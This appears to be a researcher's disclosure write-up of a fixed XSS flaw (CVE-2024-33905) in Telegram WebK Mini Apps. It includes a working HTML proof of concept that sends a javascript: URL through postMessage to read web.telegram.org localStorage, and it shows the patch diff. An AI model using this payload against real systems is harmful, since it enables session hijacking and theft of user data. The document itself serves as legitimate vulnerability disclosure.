This is the technical write up of a severe vulnerability I reported to Telegram’s Bug Bounty program on March 9th, 2024.
Telegram fixed the flaw on March 11th, 2024.
Vulnerable version: Telegram WebK 2.0.0 (486) and below
Fixed version: Telegram WebK 2.0.0 (488)
CVE-2024–33905
https://nvd.nist.gov/vuln/detail/CVE-2024-33905
Attack surface
Telegram Mini Apps
“Telegram Mini Apps are essentially web applications that you can run directly within the Telegram messenger interface. Mini Apps support seamless authorization, integrated crypto and fiat payments (via Google Pay and Apple Pay), tailored push notifications, and more.”
This attack surface also affects web3 users because it handles crypto payments through the TON Blockchain.
Vulnerability description
A malicious Mini Web App can execute arbitrary JavaScript execution in the parent context web.telegram.org leading to Session Hijacking.
The XSS vulnerability is triggered using the event type web_app_open_link via postMessage.
files
This is the cached version of the vulnerable file: https://web.telegram.org/k/appDialogsManager-aLs9GOvc.js
https://web.telegram.org/src/components/popups/webApp.ts (404 due patch)
The vulnerability occurs in the following line:
telegramWebView.addMultipleEventsListeners({
// [...]
web_app_open_link:({url:t})=>{window.open(t,"_blank")}
}The event web_app_open_link opens a new tab with the specified url passed as argument. For such cases, an attacker can use the the javascript: scheme to remain with the JavaScript context from the parent window regardless of opening a new tab with another URL. That said, the payload javascript:alert(1) would trigger the XSS PoC (execution on web.telegram.com by visiting my Mini App)
The Setup
1. Attacker creates a Bot + Mini App
2. Sets the URL of the Mini App => https://evil.com/homepage.html
3. The exploit will be hosted in the homepage of the attacker’s site
3.1. homepage.html
<body onload=exploit()>
<script>
function exploit() {
window.parent.postMessage(JSON.stringify({eventType: 'web_app_open_link', eventData: {url: "javascript:alert(JSON.stringify(window.parent.localStorage))"}}), '*');
}
</script>
</body>Exploit Demo
Telegram Patch release
web_app_open_link: ({url}) => {
- window.open(url, '_blank');
+ safeWindowOpen(url);
},safeWindowOpen
export default function safeWindowOpen(url: string) {
window.open(url, '_blank', 'noreferrer');
}The ‘noreferrer’ argument does a couple things to fix this flaw:
- Prevents the newly opened window from sending the Referer header back to the original page.
- The new window is isolated from the parent window’s context, including its JavaScript execution environment.
And this is the commit to prod (.env):
https://github.com/morethanwords/tweb/commit/b41c5d93ad2f86690dd8dcbd4ca0f66a2273ba06
VITE_API_ID=1025907
VITE_API_HASH=452b0359b988148995f22ff0f4229750
VITE_VERSION=2.0.0
- VITE_VERSION_FULL=2.0.0 (487)
- VITE_BUILD=487
+ VITE_VERSION_FULL=2.0.0 (488)
+ VITE_BUILD=488
VITE_MTPROTO_WORKER=1
VITE_MTPROTO_SW=
VITE_MTPROTO_HTTP=